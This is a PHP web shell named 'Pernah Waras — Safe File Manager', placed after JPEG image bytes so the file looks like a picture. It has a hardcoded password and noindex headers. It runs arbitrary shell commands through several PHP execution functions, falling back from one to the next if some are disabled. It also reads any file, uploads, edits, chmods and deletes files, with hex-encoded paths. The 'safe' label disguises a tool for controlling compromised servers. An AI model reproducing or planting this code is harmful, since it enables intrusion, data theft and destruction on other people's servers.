JFIF !.%+&8&+/1555$;@;4?.451 4,$,44444444444414444444444444444444444444444444444444"?!1AQaq"2BRbr#3SC!!1QAa2 ?5ZVc)t/? z>5zܬ+v_RBFn̝P8gtSTt?N/a)6 ϿjK]-eKnHTx}Sܛ7&<O[PZ-;#|oaCz3ː/TI}^ m%xɟu=Z+ISe45u;&WQ{|x*TC#ZZ6pv*Z%Oo"xOHk w+V(kM5V$ rbb57/luRjҵ`МqIC4cπO<:(^L8#_̩K(z4+;V84:[p~l{G>J"7ɋ ^ƾH#LPX=x$|W?~ ԩ {TKh)J*U;iǀ/ jZ\w=m L9/o=n.% կ|{OjE6e/d1OTsəԸhOMMHl,7¥#MF/fֽdrNʠjqx{-  rq nцƒmn<0ș;Z7Fm &9iNY ZA?,Ic14&y&p6;M0qp.᠅K@%6y63?X5PT!=MڽgSaoR>5sUc kR ]V;|~Ű {LvrעC!V {sNPg/ "ubkm$ďz6 s!swݓ .j>+ҝa&rttLAVp%c[zJXX@<L]T1өVg潦@!_@SS3& ]@JHZ rf!y4Mv*_{UuљØO*Ev U \"㪒K+4M:05!'<@>ǻ&ZCCV5o&h. |Kh$s6K)hIGOI;#$0T.5gn \:h89G)J@}:{/"_73VNJa]Ė=uACZ Qn:,{tyicĀHCk .W'bh]=,vcEHXJXoFt>6[JFsGeqfe\jGe1؋.ؔu Y G|zMpDnQWĔ%J)*p@rT2%G# !OTTa%4&hL.F_ǂa09 qyv85N]ѼS{_M#Ǹ02Pcvw9i18F+Ik17s\xh``"|Ecnh`}G !p6 0i󜵩S7-UROf$-6(}<cs]* d)m\Ig~I#C/EȎi8d>eu'लR1JE1At`t;Р%<`Oy)iIQa4\aԹHu*k)#$E; P:є8Itp3>s42Ozէ.;'}{9Շ0 $WV3 @k4@r?'C3-g$auip/ F2v㿿,nB1̨ƃqa5͝@&l\CUckעU Q噗-r w<=&=t,i;L*1$LL <) ;F{&'}K`T@I;Zs7+Oq黲9< J9OHLrk_Tu[B%E X5O ǕI0JX`%;DwҙU ئ\׮״8ӧ?km=;d5*@-0FR[6̃ڸr*KA9u*?U8@X4e-0s{ HUpU?mRaa%'tג\]th>(@RÁt h}Oau<+nTօMӐ??e95q>/;&JS *2i&:nUl=5e3c|2V>&eE;C p y9[x擼A&Dү;" Qh}q0W|Cm5\Pe3]0LD1xjgwTLΨKsxܱ kfGk/L6d9A{A3/Dkhk`"㯒rjxe}<\3y:'/h̀4~g?(]vlK~?OW%{:'Nqo(X nF{ǀ?'  099C`j@(+aun#{K`'഻/,KW;4 Nm|~fG()1 Ù-s==U66ϫc蓦Wn%<#84n OC` ns1%hý e:UZo` Zʫ1o$qހh[!ژJ:x2$&PT6 *4ݚjɠnf(L5C\rM@ }y-W}V=ٔc<M Phr TD .$OV2.=IU=ia?U'֕.~*T!-T#'elYeKrT"C@u!x{3}1(r}%namj%NE v  σK,*.zU* 9{%ֹ njdaXb)k\M7=ÂVCg8E- j)k$`-EeB]cty&d0n'W+*|Fa\GQEAp5\Ǽ8-[  uZe3}d'+:+Kۮs!$e<۔x)1aLC]kAAY{S[5H7 --,sD؀k  @( N4/o7 y'nݦndeo[,R=;S*gaiJ~ ߳բ8x埒52>Ab&-\7T,w;3{kq{\ [јr &v8]|¬ņ4IpS1z#vG!YNg:mTz1^O=~|5B畼b@SȌ#znr  ZV"Hw7u1ha3 f$onp33ͧ,]$/p e9_C]frN, E=q -:aϿ&:-} 84eQeSsuiA g㟥?ʼn*ahe:Wa@ke] Fԗr. @ZoYLSG/ <~*Zƴ>Jlƽ窘GN:IKJp/`I#-oF4|Q@|ԅ{9YYsi;s4qVI$ " 8cXGjˏAܢ eLx']"o3Ǘ0ng{> Sg238kfd6Ҁ; 'x'e ]bVkBO $!T 3M ٍ886Lop~k!;͠zu;#|u6ڈA4|l|2ǤY.<#A.khFY; M4h4&ts%FLkThaxf`˛>i3t:,+^{ۖNxi"xg >܁ZH,2ۓ:8xʢ9.--=jwµSdtwG_x$O ERw+3UMyRс9_Dl+cGc!Ko=.c(2Vm.BSV>$y:GZdǴ:cLi_+G>O䞴{X}1TcQtOP?e~{5]Rr5nZ\@ &JCV>f/5I_5 ;eh<@ &E%;X,`Okm#!yĢ| Lĝ` R=|Ch53DF#ۜ?yhB ZxhRK`dvײguY w%zpdHAM~):& vGD n 8F ~˥x`oK|?fxi%pR>+>nlFŤ'tq8LZv?߱⽆@x|PUA"vwó{0.z {,NKٞ>ݜ G}` kL {IFQ3&!z.d&-sH,P 77ݼw =c ,5Y)g[v㙑8>h]hY.{7S?~SKJۘ iuj*ԚD:4_ x?M_wL nTkUN:fV MARTX-%iTTقJϐZxWfG 2aZ7OU3[ATތ- &(k:YW )tcTw4|LǪv- qU qPE. ,s]8oi>xx)$vf$Ž |w;IJb` {Ӥ$Yn@9JG m ܯW4ۇ#n-?|сڹ'9K `hSS?7W_B:=q`<8ӌl2d곣h[l|$vro~'RmYͧP |PU:3[{X@W u*=.pdt@Gs crѨ@>ֱ. 'ME[YĵC U'9%eNUsD3/+UI9h.WC빓$#:pz:Yx*$+$kA U>)_Ab9U 9OFhal13[rUCksN] RH+cv0i76s!= ~'moi1)yV8 CLWYiH6im^Y7*ѩLQr*L$ D9ȮqbqC)vsVT,<OJfPð .wFir2_Y *ƀx\ 9@ |F⇥kZ@h0t-<q*ZL)&BJpF5=$at*Z$tdRI1 2$$I$#SޒH;$t$`<(t)$.fXKt=$oI%RgcyI%!) $ԒIIG=')) { $decoded = base64_decode($data, true); if ($decoded !== false) return $decoded; // fallback: try decode then verify $maybe = base64_decode($data); if ($maybe === false) return false; if (base64_encode($maybe) === str_replace(array("\r","\n"),'', $data)) return $maybe; return false; } else { // Very old PHP: best-effort $maybe = base64_decode($data); return $maybe === false ? false : $maybe; } } /* ----------------- CONFIG ----------------- */ // If you want a simple password gate, set $ADMIN $ADMIN_PASSWORD = 'kamunanya'; // set to '' to disable auth /* --------------- ENV / STABILIZER --------------- */ @header_remove(); header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, noimageindex', true); header('Referrer-Policy: no-referrer', true); header('X-Frame-Options: DENY', true); header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0', true); header('Pragma: no-cache', true); header('Expires: 0', true); header('Content-Type: text/html; charset=UTF-8', true); header('X-Content-Type-Options: nosniff', true); header('X-XSS-Protection: 1; mode=block', true); header('Strict-Transport-Security: max-age=63072000; includeSubDomains; preload', true); /* ----------------- SESSION & CSRF ----------------- */ if (session_status() !== PHP_SESSION_ACTIVE) session_start(); if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(16)); } function csrf_input(){ echo ''; } function ensure_csrf(){ if ($_SERVER['REQUEST_METHOD'] === 'POST'){ $tok = isset($_POST['csrf']) ? (string)$_POST['csrf'] : ''; $sess = isset($_SESSION['csrf_token']) ? (string)$_SESSION['csrf_token'] : ''; if (!hash_equals($sess, $tok)) { http_response_code(400); exit('CSRF token invalid'); } } } /* ----------------- AUTH (optional) ----------------- */ function ensure_auth($passwordSetting) { if (!$passwordSetting) return true; // disabled if (!isset($_SESSION['__asli_authed']) || $_SESSION['__asli_authed'] !== true) { // check submitted if (isset($_POST['__asli_login'])) { if (isset($_POST['__asli_password']) && $_POST['__asli_password'] === $passwordSetting) { $_SESSION['__asli_authed'] = true; return true; } $_SESSION['__asli_last_error'] = 'Invalid password'; return false; } return false; } return true; } /* ----------------- UTIL & SAFE HELPERS ----------------- */ function is_fn_usable($fn) { if (!function_exists($fn)) return false; $disabled = (string) @ini_get('disable_functions'); $suhosin = (string) @ini_get('suhosin.executor.func.blacklist'); $blocked = array(); if ($disabled !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $disabled))); if ($suhosin !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $suhosin))); if (!empty($blocked)) { $blocked = array_map('strtolower', array_filter($blocked)); return !in_array(strtolower($fn), $blocked, true); } return true; } function strToHex($s){ $h=''; for($i=0;$i=1024&&$i<4){ $s/=1024; $i++; } return round($s,2).' '.$u[$i]; } function getFileDetails($p){ $f=array(); $d=array(); $i=@scandir($p); if(!is_array($i)) return array(); foreach($i as $it){ if($it=='.'||$it=='..') continue; $fp=rtrim($p,'/').'/'.$it; $det=array('name'=>$it,'type'=>is_dir($fp)?'Folder':'File','size'=>is_dir($fp)?'':formatSize(@filesize($fp)),'permission'=>@substr(sprintf('%o',@fileperms($fp)),-4)); if(is_dir($fp)) $d[]=$det; else $f[]=$det; } return array_merge($d,$f); } function changeDirectory($p){ $p==='..'?@chdir('..'):@chdir($p); } function getCurrentDirectory(){ $rp = realpath(getcwd()); return $rp ? $rp : getcwd(); } function getLink($p,$n){ return is_dir($p) ? ''.htmlspecialchars($n).'' : ''.htmlspecialchars($n).''; } function showBreadcrumb($p){ $p=str_replace('\\','/',$p); $paths=explode('/',$p); echo'
/'; $acc=''; foreach($paths as $pa){ if($pa==='') continue; $acc.='/'.$pa; echo''.htmlspecialchars($pa).'/'; } echo'
'; } /* create file with guaranteed non-zero content */ function create_nonzero_file($path,$userContent=null){ $default="Created by Pernah Waras safe manager @ ".date('c')."\n"; $payload = ($userContent !== null && $userContent !== '') ? $userContent : $default; if (@file_put_contents($path,$payload,LOCK_EX) > 0) return array(true,'file_put_contents'); if ($fp=@fopen($path,'wb')){ $w=@fwrite($fp,$payload); @fclose($fp); if($w>0) return array(true,'fopen+fwrite'); } if ($tmp=@tempnam(sys_get_temp_dir(),'asli_')){ @file_put_contents($tmp,$payload); if(@rename($tmp,$path)||@copy($tmp,$path)){ @unlink($tmp); if(@filesize($path)>0) return array(true,'tempnam+rename/copy'); } @unlink($tmp); } if ($src=@fopen('php://temp','wb+')){ @fwrite($src,$payload); @rewind($src); if($dst=@fopen($path,'wb')){ $copied=@stream_copy_to_stream($src,$dst); @fclose($dst); if($copied>0){ @fclose($src); return array(true,'php://temp copy'); } } @fclose($src); } if (@touch($path) && @file_put_contents($path,$payload,FILE_APPEND) > 0) return array(true,'touch+append'); return array(false,'All methods failed'); } /* ----------------- SAFE SYSTEM WRAPPERS (fx_*) ----------------- */ if (!function_exists('fx_proc_open')) { function fx_proc_open($cmd, $des, &$pipes, $cwd=null, $env=null){ if (!is_fn_usable('proc_open')) return false; return @proc_open($cmd, $des, $pipes, $cwd, $env); } } if (!function_exists('fx_shell_exec')) { function fx_shell_exec($cmd){ if (!is_fn_usable('shell_exec')) return null; return @shell_exec($cmd); } } if (!function_exists('fx_exec')) { function fx_exec($cmd, &$out=null, &$code=null){ if (!is_fn_usable('exec')) { $out = array(); $code = 127; return null; } @exec($cmd, $out, $code); return $out; } } if (!function_exists('fx_system')) { function fx_system($cmd, &$code=null){ if (!is_fn_usable('system')) { $code = 127; return null; } ob_start(); @system($cmd, $code); $o = ob_get_clean(); return $o; } } if (!function_exists('fx_popen')) { function fx_popen($cmd, $mode){ if (!is_fn_usable('popen')) return false; return @popen($cmd, $mode); } } /* unified command runner (tries multiple methods) */ if (!function_exists('run_command_all')) { function run_with_proc_open($cmd,$cwd=null,$timeout=30){ if (!is_fn_usable('proc_open')) return null; $des = array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')); $pipes = array(); $proc = @proc_open($cmd,$des,$pipes,$cwd?:null,null); if (!is_resource($proc)) return null; @stream_set_blocking($pipes[1], false); @stream_set_blocking($pipes[2], false); @fclose($pipes[0]); $buf=''; $start=time(); while(true){ $status = @proc_get_status($proc); $running = $status && !empty($status['running']); $r = array(); if (isset($pipes[1]) && is_resource($pipes[1])) $r[] = $pipes[1]; if (isset($pipes[2]) && is_resource($pipes[2])) $r[] = $pipes[2]; if ($r){ $w = $e = null; @stream_select($r,$w,$e,1); foreach($r as $p){ $chunk = @fread($p,8192); if ($chunk !== false && $chunk !== '') $buf .= $chunk; } } else { usleep(100000); } if (!$running) break; if ($timeout>0 && (time()-$start) >= $timeout){ @proc_terminate($proc, 9); foreach ($pipes as $p) if (is_resource($p)) @fclose($p); @proc_close($proc); return array('method'=>'proc_open','code'=>124,'out'=>$buf."\n[timeout after {$timeout}s]"); } } foreach ($pipes as $p) if (is_resource($p)) @fclose($p); $code = @proc_close($proc); if ($code === -1) $code = null; return array('method'=>'proc_open','code'=>$code,'out'=>$buf); } function run_with_shell_exec($cmd,$cwd=null){ if (!is_fn_usable('shell_exec')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $out = @shell_exec($full); if ($out === null) return null; return array('method'=>'shell_exec','code'=>null,'out'=>$out); } function run_with_exec($cmd,$cwd=null){ if (!is_fn_usable('exec')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $lines = array(); $code = 0; @exec($full,$lines,$code); return array('method'=>'exec','code'=>$code,'out'=>implode("\n",(array)$lines)); } function run_with_system($cmd,$cwd=null){ if (!is_fn_usable('system')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; ob_start(); @system($full,$code); $out = ob_get_clean(); return array('method'=>'system','code'=>$code,'out'=>$out); } function run_with_popen($cmd,$cwd=null){ if (!is_fn_usable('popen')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $h = @popen($full,'r'); if (!is_resource($h)) return null; $buf = ''; while (!feof($h)){ $chunk = @fread($h,8192); if ($chunk===false) break; $buf.=$chunk; } @pclose($h); return array('method'=>'popen','code'=>null,'out'=>$buf); } function run_command_all($cmd,$cwd=null){ $po = run_with_proc_open($cmd,$cwd,30); if ($po) return $po; $order = array('run_with_shell_exec','run_with_exec','run_with_system','run_with_popen'); foreach ($order as $fn){ if (function_exists($fn)) { $res = $fn($cmd,$cwd); if ($res) return $res; } } return array('method'=>'none','code'=>127,'out'=>"Command runner not available on this PHP build."); } } /* ----------------- REQUEST HANDLING ----------------- */ // initial directory $curDir = getCurrentDirectory(); $msg = ''; $cmdOutput = ''; // optional password gate: if configured, require auth before showing UI $auth_ok = ensure_auth($ADMIN_PASSWORD); if ($ADMIN_PASSWORD && !$auth_ok) { $last = isset($_SESSION['__asli_last_error']) ? $_SESSION['__asli_last_error'] : ''; unset($_SESSION['__asli_last_error']); echo ' Pernah Waras Login '; exit; } // GET helpers if (isset($_GET['get_filename'])) { echo basename(hexToStr($_GET['get_filename'])); exit; } if (isset($_GET['ambil-lc-cok'])) { $f = hexToStr($_GET['ambil-lc-cok']); if (file_exists($f)) echo @file_get_contents($f); exit; } if (isset($_GET['dir'])) { changeDirectory(hexToStr($_GET['dir'])); $curDir = getCurrentDirectory(); } // POST actions — protect with CSRF if ($_SERVER['REQUEST_METHOD'] === 'POST') { ensure_csrf(); // validate token // create folder if (isset($_POST['new_folder']) && !empty($_POST['folder_name'])) { $nf = $curDir . '/' . basename($_POST['folder_name']); if (!file_exists($nf)) @mkdir($nf,0755,true); $msg = 'Folder created.'; } // create file if (isset($_POST['new_file']) && !empty($_POST['file_name'])) { $fp = $curDir . '/' . basename($_POST['file_name']); $file_content = isset($_POST['file_content']) ? $_POST['file_content'] : null; list($s,$m) = create_nonzero_file($fp, $file_content); $msg = $s ? "File created using $m." : "Failed to create file."; } // upload if (isset($_POST['upload_file']) && isset($_FILES['uploaded_file'])) { $targetPath = $curDir . '/' . basename($_FILES['uploaded_file']['name']); $tmpFile = $_FILES['uploaded_file']['tmp_name']; if (is_uploaded_file($tmpFile) && @filesize($tmpFile) > 0) { if (@move_uploaded_file($tmpFile, $targetPath)) { $msg = 'File uploaded successfully (move_uploaded_file).'; } else { $content = @file_get_contents($tmpFile); list($success,$method) = create_nonzero_file($targetPath, $content); $msg = $success ? "File uploaded using fallback ($method)." : "Upload failed (fallback failed)."; } } else { list($success,$method) = create_nonzero_file($targetPath, "Upload placeholder @ ".date('c')); $msg = $success ? "Empty upload handled, file created using $method." : "Upload failed (empty file)."; } } // edit/save if (isset($_POST['edit_file'])) { $f = hexToStr($_POST['edit_file']); if (file_exists($f) && is_writable($f)) { $c = isset($_POST['content']) ? $_POST['content'] : ''; if (isset($_POST['mode']) && $_POST['mode'] === 'b64') { // only accept strict base64 (PHP 5.2.0+ with second arg) $dec = safe_base64_decode($c); if ($dec === false) { $msg = 'Save failed: invalid Base64 data'; } else { list($success,$method) = create_nonzero_file($f, $dec); $msg = $success ? "File edited using $method." : "Failed to edit file."; } } else { list($success,$method) = create_nonzero_file($f, $c); $msg = $success ? "File edited using $method." : "Failed to edit file."; } } else { $msg = 'Save failed (file not writable or missing).'; } } // rename if (isset($_POST['rename_path']) && !empty($_POST['new_name'])) { $old = hexToStr($_POST['rename_path']); $new = basename($_POST['new_name']); if ($old && $new && file_exists($old)) @rename($old, dirname($old).'/'.$new); $msg = 'Renamed.'; } // chmod if (isset($_POST['chmod_path']) && !empty($_POST['chmod_value'])) { $path = hexToStr($_POST['chmod_path']); $perm = intval($_POST['chmod_value'],8); if (file_exists($path)) @chmod($path, $perm); $msg = 'Permission changed.'; } // delete if (isset($_POST['delete_path'])) { $f = hexToStr($_POST['delete_path']); if (is_file($f)) @unlink($f); elseif (is_dir($f)) { $fs = @glob($f.'/*'); if (is_array($fs)) { foreach($fs as $fi) is_dir($fi) ? @rmdir($fi) : @unlink($fi); } @rmdir($f); } $msg = 'Deleted.'; } // optional rename/chmod/delete variations in UI may use same fields // other actions fall through } /* ---------- Command handler (separate from file POSTs) ---------- */ if (isset($_POST['cmd']) && !empty(trim((string)$_POST['cmd']))) { // protect with CSRF (already enforced above) $c = trim((string)$_POST['cmd']); // Basic filtering: remove suspicious control characters $c = preg_replace('/[^\x20-\x7E]/', '', $c); try { $result = run_command_all($c, $curDir); $cmdOutput = is_array($result) && isset($result['out']) ? $result['out'] : (string)$result; } catch (Exception $e) { $cmdOutput = 'Error: '.$e->getMessage(); } } /* ----------------- HTML / UI ----------------- */ ?> Pernah Waras — Safe File Manager

Pernah Waras — Safe File Manager

'.htmlspecialchars($msg).''; ?>
NameTypeSizePermissionActions
Edit | Rename | Chmod | Delete